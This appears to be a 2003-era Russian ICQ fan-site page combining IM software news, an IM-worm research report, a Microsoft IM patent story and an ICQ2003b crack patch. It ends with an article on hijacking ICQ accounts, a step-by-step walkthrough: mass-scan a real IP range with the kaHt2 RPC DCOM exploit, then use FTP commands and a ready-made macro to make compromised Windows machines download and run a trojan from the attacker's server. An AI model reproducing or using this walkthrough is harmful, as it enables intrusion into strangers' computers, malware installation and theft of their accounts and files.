Bopup Communication Server представляет собой корпоративное решения для передачи сообщений в локальных сетях. С его помощью можно управлять учетными записями (аккаунтами) пользователей, сетевыми группами, новостной рассылкой и обмениваться сообщениями в случае если адресат в настоящий момент недоступен в локальной сети.

Ключевые возможности:

[li]Не требуется выход в Интернет
Вы можете быть уверены что весь обмен сообщениями и никакая пересылаемая информация не покидают пределы вашей локальной сети, что гораздо повышает конфиденциальность общения.

[li]Прозрачность всех операций для конечных пользователей
Каждый пользователь автоматически получает текущие настройки для общения с сервера.

[li]Управление учетными записями пользователей
Вы можете добавлять, редактировать, удалять пользовательские аккаунты и позволить пользователям самостоятельно создавать и модифицировать их собственную информацию.

[li]Совместимость с Active Directory (AD)
Пользовательские аккаунты могут быть импортированы из Active Directory. Аккаунт информация доступна для модификации самим пользователем, а также для просмотра всеми другими пользователями.

[li]Централизованное управление Сетевыми Группами
Каждый пользователь получает список сетевых групп, назначенных ему, независимо от компьютера на который он вошел.

[li]Передача оффлайновых сообщений
Пользователи могут обмениваться сообщениями даже если адресат недоступен в локальной сети. Сообщение автоматически передается получателю как только он становится доступным в сети.

[li]Система новостной рассылки
Вы можете создавать новостные сообщения, указывать список адресатов, приоритет сообщения, частоту рассылки, время и уведомлять пользователей о любых событиях, таких как обсуждение проекта, собрание, обеденный перерыв и т.д.

Скачать Bopup Communication Server ( 5.1M )
Скачать Bopup Messenger ( 1.5M )

Вышла Gaim 0.71. Эта версия Gaim должна была появиться раньше, но у Sourceforge.net были проблемы.

Посмотреть изменения Gaim 0.71
Скачать Gaim 0.71 для win32

Обновилась freeware версия IM клиента Trillian.

Скачать Trillian v0.74f

Компьютерный червь, передаваемый через системы обмена сообщениями, теоретически может заразить полмиллиона компьютеров за 30 секунд.

До сих пор не было создано вируса, распространяющегося через IM-системы. Однако специалисты по компьютерной безопасности утверждают, что заражение таких приложений представляет очевидную и очень серьезную угрозу.

Специалисты провели ряд тестов и моделирований, благодаря которым удалось установить упомянутый примерный предел скорости распространения вируса по IM-приложениям. В основу тестов было положено время, необходимое для обмена пакетами информации между IM-приложениями и среднее количество пользователей в контакт-листе интернет-пейджера.

По словам руководителя научной группы, проводившей исследования, среднее время, которое потребуется IM-червю для инфицирования 500000 машин - 30 секунд. Даже в самом пессимистичном (для червя) сценарии это займет меньше трех минут.

На сегодняшний день в IM-клиентах найдено около 60 "дыр", через которые мог бы проникнуть червь. Найти другие машины для заражения червю не составит труда: контакт-лист каждого IM-клиента хранится в незащищенной папке и может быть легко использован.

Однако, у IM-сетей есть и определенные способы защиты от такого рода эпидемий. Например, эти сети имеют центральный сервер, на котором происходит вход пользователя в систему и последующий обмен данными с другими пользователями сети. Распространение червя вызовет скачек трафика, который попросту "завалит" сервер, останавливая при этом и эпидемию.

Централизованные системы также могут использоваться для быстрого залатывания "дыр" в пользовательских приложениях. Некоторые сети уже имеют функцию автоматического отказа от обслуживания устаревших версий IM-клиента.

Скорость IM-коммуникаций несравнимо выше, как и потенциальная скорость распространения червя по ним.

Софтверный гигант стал владельцем патента на способ оповещения пользователей системы немедленного обмена сообщениями (IM) о том, что его собеседник набирает ответное сообщение.


Выданный во вторник патент No. 6,631,412 относится к функции, которая применяется в IM-продуктах не только Microsoft, но и ее конкурентов — America Online и Yahoo. Он может послужить орудием в борьбе Microsoft за долю рынка систем IM. Microsoft обильно инвестирует в IM, рассчитывая использовать этот продукт в качестве локомотива продаж коммуникационного ПО для предприятий. В конце этого года Microsoft планирует выпустить Live Communications Server — программный продукт, в который первоначально войдет корпоративная система IM, а затем будут добавлены интернет-телефония и видео.

Сейчас компания предлагает MSN Messenger, бесплатно загружаемый через веб, а также Windows Messenger, IM-клиент для своей операционной системы XP. Обе службы насчитывают миллионы пользователей.

Патент может стать мощным инструментом только в том случае, если компания сумеет доказать в суде, что ее права на изобретение неоспоримы. Если же кто-то захочет опротестовать патент, он должен будет доказать, что его владелец зарегистрировал изобретение не первым. «Это означает, что нужно будет найти аналоги системы немедленного обмена сообщениями, существовавшие до подачи заявки», — говорит специалист по правам интеллектуальной собственности адвокатской фирмы Oppedahl, Larson & Frisco из Колорадо Карл Оппендал.

Представитель Microsoft отказался от комментариев по поводу патента, как и представители AOL и Yahoo.

Microsoft не первая компания, получившая патент на IM. В декабре 2002 года ICQ, подразделение AOL, получило патент, подтверждающий его права как изобретателя IM. AOL не стала размахивать этим патентом, и конкурирующие службы IM продолжают действовать.

Стремление компаний запатентовать элементы IM подчеркивает популярность и потенциал этого приложения. IM широко применяется миллионами веб-серферов, которые обмениваются текстовыми сообщениями друг с другом в реальном времени. Наиболее популярные IM-службы — AOL Instant Messenger, Yahoo Messenger и MSN — добавляют такие функции, как видеоконференцсвязь, анимированные смайлики и мобильный доступ.

Возможности патча:

Позволяет вписать это в ваши детали
° многострочный ник
° многострочное имя
° многострочную фамилию
° многострочный город
° многострочный штат
° многострочный почтовый индекс
° многострочный город работы
° многострочный штат работы
° многострочный почтовый индекс работы
° многострочное имя компании
° многострочную дивизию/департамент компании
° многострочную позицию на работе
° многострочное имя организации
° экстра многострочный адрес улицы
° возраст до 255
° Страна: "Unknown"
° любой (без собаки - "@" или точки - "." и многострочный e-mail адрес

Позволяет искать в поиске
° многострочные ники
° многострочные имена
° многострочные фамилии
° любой UIN (от 1 до 99999999999999)
° любой (без собаки - "@" или точки - "." и многострочный e-mail адрес

Позволяет вам зарегистрировать UIN с многострочным
° ником
° именем
° фамилией
° паролем
° многострочный e-mail адрес (без собаки - "@" или точки - "."

Позволяет производить поиск в Белых Страницах по
° многострочным никам
° многострочным именам
° многострочным фамилиям
° многострочным Городам/Штатам
° многострочным Компаниям
° многострочным Департаментам
° многострочным Позициям
° многострочным Ключевым словам
° Стране: "Unknown"
° любым (без собаки - "@" или точки - "." и многострочным e-mail адресам

Позволяет вам использовать многострочные пароли в ICQ
Убирает диалог, которое выдает ICQ после того как найдет в поиске больше чем 20 пользователей
Убирает верхний банер в главном окне ICQ
Убирает верхний поиск через google.com
Убирает банеры в окне сообщения
Показывает IP пользователей в их инфе (как в ICQ99x)*
Позволяет писать меньше чем 6 символов в пароле
Позволяет запустить несколько окон ICQ одновременно
Позволяет преодолеть лимит на 7 разных номеров в одной ICQ
Убирает сервисы ICQ, которые ICQ2003b предлагает после регистрации
Убирает окно приветствия ICQ

Скачать патч (85kb)

Большое спасибо Coban2k, без него, такой скорый выпуск патча, не имел бы места. Спасибо тебе за помощь.

Просьба тем, кто будет выкладывать патч на своих ресурсах, давать прямую ссылку с нашего сайта.

Вышла новая версия программы ICQ Commander
Эта программа, которая
позволяет запускать несколько копий ICQ
на одном компьютере, изменять путь к
базам данных ICQ и другое.

Скачать ICQ Commander v1.51

На нашем форуме появилась фотогалерея пользователей.
Посмотреть фотогалерею вы можете тут.
Если вы являетесь участником форума, вы можете добавить свою фотографию зайдя в вашу панель управления.

Компания Zone Labs, известная своим популярным сетевым фильтром ZoneAlarm, намерена выпустить похожий продукт для IM-клиентов типа Trillian и Yahoo!Messenger.

Возможно, что первый программный пакет Zone Labs для корпоративных пользователей, способный защищать их чат-клиенты от целенаправленных сетевых атак и проникновения интернет-червей, появится в продаже уже в четвертом квартале текущего года. Впрочем, как сообщает TechWeb News, платную версию IMSecure Pro за 19,95 долларов и бесплатную IMSecure с немного ограниченной функциональностью можно скачивать уже сейчас.

Механизм работы приложения относительно прост: программа сидит в засаде между копией IM-клиента на пользовательском компьютере и удаленным IM-сервером, тщательно проверяя трафик на предмет проникновения вредоносных программ, червей, вирусов и атак с переполнением буфера. Помимо этого, IMSecure еще и шифрует сообщения, проходящие между двумя IM-клиентами, защищая их от перехвата третьими лицами (разумеется, при условии, что IMSecure установлена на обоих клиентах), а также устанавливает ограничения на определенные операции: например, запрет на прямую передачу файлов или видеоконференции.

К сожалению, полный набор этих радостей доступен только для зарегистрированных пользователей платного IMSecure Pro. С другой стороны, следует признать, что для отечественных пользователей это как раз не проблема.

В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.

Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.

Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.

Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:

1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян .
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.

Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:

"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye"

После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" .

Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.

Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).

Всем спасибо, все свободны.

Обсуждение в форуме.